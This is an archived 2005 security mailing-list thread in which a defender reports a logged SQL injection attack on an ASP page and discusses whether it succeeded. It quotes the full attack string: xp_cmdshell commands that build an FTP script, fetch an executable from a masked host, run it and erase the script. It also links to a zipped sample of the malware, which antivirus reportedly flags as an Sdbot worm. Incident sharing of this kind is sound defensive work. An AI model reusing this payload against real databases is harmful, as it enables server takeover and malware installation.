Security Incidents mailing list archives
Re: SQL injection ... another attack
From: "Maxime Ducharme" <mducharme () cybergeneration com>
Date: Thu, 20 Jan 2005 15:49:39 -0500
I must first thank everybody who replied, I received alot of useful information. This attack have been detected by our home-made webapp security monitoring tool How can you tell this worked ? I can ensure it didnt. Our firewalls also restrict outbound access, so IRC communication couldnt work. Our servers simply does not have Internet access, they can only reply to opened TCP connection on port 80. Database Server is back-end, private IP on separate VLAN without gateway set in IP config. Ciao Maxime Ducharme Programmeur / Spécialiste en sécurité réseau ----- Original Message ----- From: "Harlan Carvey" <keydet89 () yahoo com> To: "gaurav kumar" <gkverma () gmail com>; "Maxime Ducharme" <mducharme () cybergeneration com> Cc: <incidents () securityfocus com> Sent: Thursday, January 20, 2005 1:57 PM Subject: Re: SQL injection ... another attack
I think the real issue here is that the SQL Injection worked.... --- gaurav kumar <gkverma () gmail com> wrote:my VirusScan (network associates) detected it as W32/Sdbot.worm.gen On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme <mducharme () cybergeneration com> wrote:Hi to the list today we received the same SQL injection attack on the same URL : IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net) User Agent : none sent HTTP Verb : GET /theasppage.asp?anID= Attack : 377';exec MASTER..xp_cmdshell 'mkdir%systemroot%\system32\Macromed\lolx\';exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER chadickar0ckpaul >>%systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe%systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v-s:%systemroot%\system32\Macromed\lolx\blah.jkd';exec MASTER..xp_cmdshell 'del%systemroot%\system32\Macromed\lolx\blah.jkd';exec MASTER..xp_cmdshell'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--The lol.exe file can be found in this archive forinspection :http://www.cybergeneration.com/security/2005.01.19/lol.zipzip pass is das978tewa234 Norton with definitions of 12 jan. doesnt findanythingsuspicious. I'm interested if someone do an analysis on thisfile.Have a nice day Maxime Ducharme Programmeur / Spécialiste en sécurité réseau ----- Original Message ----- From: "Maxime Ducharme"<mducharme () cybergeneration com>To: <full-disclosure () lists netsys com>; "GeneralDShield Discussion List"<list () lists dshield org>;<incidents () securityfocus com>Sent: Wednesday, January 05, 2005 12:22 PM Subject: SQL injection worm ?
<snipped>
Current thread:
- SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Teodor Cimpoesu (Jan 20)
- Re: SQL injection ... another attack gaurav kumar (Jan 20)
- Re: SQL injection ... another attack Harlan Carvey (Jan 20)
- Re: SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Harlan Carvey (Jan 20)